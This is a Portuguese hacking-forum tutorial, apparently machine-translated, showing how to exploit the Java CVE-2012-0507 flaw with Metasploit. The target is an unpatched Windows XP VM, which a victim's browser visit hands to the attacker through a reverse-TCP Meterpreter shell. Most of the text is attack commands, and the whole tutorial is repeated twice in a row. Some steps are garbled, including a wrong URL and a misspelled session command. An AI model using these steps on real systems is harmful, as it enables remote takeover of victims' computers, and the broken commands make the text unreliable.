Créditos: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Edição:Ice Mike
Requisitos:
Vmware Player com windows xp em modo bridge
Distro de Pentest (Backtrack,Backbox,Bugtraq a escolha é sua)
JRE 6 (versão sem patch)
CVE-2012-0507 é uma vulnerabilidade no JRE, devido ao fato de que a implementação da classe AtomicReferenceArray não verificar corretamente se a matriz é de um objeto esperado [tipo]. Um aplicativo Java malicioso ou applet poderia usar esta falha para causar Java Virtual Machine (JVM) para travar ou ignorar as restrições de Java sandbox.
Notícias sobre segurança: Essa vulnerabilidade afeta o Windows, Mac e Linux. No mês passado, malware Flashback infectar mais de 600 mil computadores Mac , explorando essa vulnerabilidade. Recentemente, o INSS , The Amnesty International UK sites injetado com código malicioso, que exploram a CVE-2012-0507.
Eu estou indo para demonstrar esta vulnerabilidade com o VirtualBox. Eu tenho a configuração duas máquinas virtuais ou seja, "Destino" e "BT5". Eu instalei o XP 2 no Target e R2 Backtrack 5 no 'BT5'.
(? Precisam de ajuda para configurar o VM, leia isto: Laboratório de configuração PenTesting ).
Parte I: Preparando o computador de destino:
Inicie o "alvo" da máquina.
Instalar o JRE 6.
Parte II: Preparação da máquina PenTesting:
Agora, começar a BT5.
Abra o terminal e digite "msfupdate". Isto irá atualizar o Metasploit Framework (MSF) com as últimas façanhas e cargas úteis. Como CVE-2012-0507 é o mais recente vulnerabilidade, você tem que atualizar o MSF antes de prosseguir.
Parte III:
Explorando o Java AtomicReferenceArray Vulnerabilidade Violação Tipo:
Etapa 1:
Abra o Terminal e "msfconsole" tipo. Isto irá trazer o console Metasploit, aqui você pode interagir com o MSF.
Etapa 2:
Tipo "use exploit/multi/browser/java_atomicreferencearray". Este comando irá usar o módulo java_atomicreferencearray.rb para o ataque.
Agora digite "show options" para mostrar as configurações que estão disponíveis e / ou necessários para este módulo específico.
Agora digite "set SRVPORT 80".
e "set URIPATH /".
Passo 3: Carga Set
Escolhendo PAYLOAD
set payload java/meterpreter/reverse_tcp
Passo 4:definindo LHOST
ABRA O TERMINAL DIGITE ifconfig olhe em inet adress seu ip
agora volte ao terminal do metasploit e digite
set LHOST meuip
Parte 5:invadindo a maquina
Digite "exploit" no msfconsole. Isto irá iniciar o manipulador inversa à nossa máquina e que vai esperar alguém que vai ligar para o servidor HTTP nosso (Ex: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Uma vez vítima ligar para o nosso servidor, ele irá enviar um frasco que vai explorar a vulnerabilidade CVE-2012-0507.
Abra o Firefox / IE na máquina de destino.
Digite "http://ip da vitima".
Ele carrega nada, mas exploit será executado em segundo plano.
agora no backtrack 5 ja deve ter aprecido Meterpreter session opened
agora ainda no metasploit digite
session -i 1
pronto agora o console estara assim
Meterpreter>
apenas digite os comandos que voce realizara as açoes do cmd no alvo
exemplo:dir
isso iria mostrar as pastas
Espero que tenham gostado pessoal deu um trabalho editar isso pq tava meio errado o tutorial intao tive q consertar
é isso ai flws galera
Edição:Ice Mike
Requisitos:
Vmware Player com windows xp em modo bridge
Distro de Pentest (Backtrack,Backbox,Bugtraq a escolha é sua)
JRE 6 (versão sem patch)
CVE-2012-0507 é uma vulnerabilidade no JRE, devido ao fato de que a implementação da classe AtomicReferenceArray não verificar corretamente se a matriz é de um objeto esperado [tipo]. Um aplicativo Java malicioso ou applet poderia usar esta falha para causar Java Virtual Machine (JVM) para travar ou ignorar as restrições de Java sandbox.
Notícias sobre segurança: Essa vulnerabilidade afeta o Windows, Mac e Linux. No mês passado, malware Flashback infectar mais de 600 mil computadores Mac , explorando essa vulnerabilidade. Recentemente, o INSS , The Amnesty International UK sites injetado com código malicioso, que exploram a CVE-2012-0507.
Eu estou indo para demonstrar esta vulnerabilidade com o VirtualBox. Eu tenho a configuração duas máquinas virtuais ou seja, "Destino" e "BT5". Eu instalei o XP 2 no Target e R2 Backtrack 5 no 'BT5'.
(? Precisam de ajuda para configurar o VM, leia isto: Laboratório de configuração PenTesting ).
Parte I: Preparando o computador de destino:
Inicie o "alvo" da máquina.
Instalar o JRE 6.
Parte II: Preparação da máquina PenTesting:
Agora, começar a BT5.
Abra o terminal e digite "msfupdate". Isto irá atualizar o Metasploit Framework (MSF) com as últimas façanhas e cargas úteis. Como CVE-2012-0507 é o mais recente vulnerabilidade, você tem que atualizar o MSF antes de prosseguir.
Parte III:
Explorando o Java AtomicReferenceArray Vulnerabilidade Violação Tipo:
Etapa 1:
Abra o Terminal e "msfconsole" tipo. Isto irá trazer o console Metasploit, aqui você pode interagir com o MSF.
Etapa 2:
Tipo "use exploit/multi/browser/java_atomicreferencearray". Este comando irá usar o módulo java_atomicreferencearray.rb para o ataque.
Agora digite "show options" para mostrar as configurações que estão disponíveis e / ou necessários para este módulo específico.
Agora digite "set SRVPORT 80".
e "set URIPATH /".
Passo 3: Carga Set
Escolhendo PAYLOAD
set payload java/meterpreter/reverse_tcp
Passo 4:definindo LHOST
ABRA O TERMINAL DIGITE ifconfig olhe em inet adress seu ip
agora volte ao terminal do metasploit e digite
set LHOST meuip
Parte 5:invadindo a maquina
Digite "exploit" no msfconsole. Isto irá iniciar o manipulador inversa à nossa máquina e que vai esperar alguém que vai ligar para o servidor HTTP nosso (Ex: [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Uma vez vítima ligar para o nosso servidor, ele irá enviar um frasco que vai explorar a vulnerabilidade CVE-2012-0507.
Abra o Firefox / IE na máquina de destino.
Digite "http://ip da vitima".
Ele carrega nada, mas exploit será executado em segundo plano.
agora no backtrack 5 ja deve ter aprecido Meterpreter session opened
agora ainda no metasploit digite
session -i 1
pronto agora o console estara assim
Meterpreter>
apenas digite os comandos que voce realizara as açoes do cmd no alvo
exemplo:dir
isso iria mostrar as pastas
Espero que tenham gostado pessoal deu um trabalho editar isso pq tava meio errado o tutorial intao tive q consertar
é isso ai flws galera